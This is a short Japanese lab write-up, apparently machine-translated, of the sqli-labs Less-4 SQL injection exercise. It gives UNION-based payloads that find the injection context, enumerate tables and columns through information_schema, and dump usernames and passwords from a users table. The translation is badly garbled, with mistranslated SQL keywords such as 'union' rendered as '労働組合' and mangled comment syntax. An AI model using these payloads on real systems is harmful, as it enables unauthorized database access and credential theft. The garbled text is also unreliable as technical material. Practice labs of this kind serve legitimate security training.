二重引用符でLess4注入文字
1.注入点、噴射タイプの分析
正常に戻り(1)ID = 1」ページを?
(2)ID = 1,1戻り通常のページへの
入力を二重引用符は、「与えられたに従って、データベースが与えられたとき(3)それは括弧のペアに配置されたidと二重引用符に追加する必要があり、ここでIDに、見られます。
?ID = 1 ")エラーページの
ID = 1?")と1 = 1 - + ページ、通常の応答
ID = 1「)と1 = 2 - ?+ ページ応答エラー
2.ユニオンクエリへの組合
附上ペイロード
ID?= - 1 ")順序 によって 3 - + ID?= - 1 ")組合 を選択 1、2、データベース()- + ID?= - 1「)組合 を選択 1、2、GROUP_CONCAT( TABLE_NAME)から INFORMATION_SCHEMA.TABLES TABLE_SCHEMA = データベース()- + ?ID = - 1「)組合を選択1 、2、GROUP_CONCAT(COLUMN_NAME)から information_schema.columns TABLE_NAME = ' ユーザー' - + ?idが- = 1「)労働組合を選択1、2、GROUP_CONCAT(ユーザ名、0x3a、パスワード)からユーザ- +
PS:白概要
データベースはエラー内容から関連する情報へのアクセスを与えられているかどうかを確認するために)、このような」\&などの特殊文字を入力しようとするとエラーメッセージ(1)は存在しませんでした。
あなたがいない、他の種類を検討されている場合は、注射を与えられています。
ホワイト注射RECORDS!!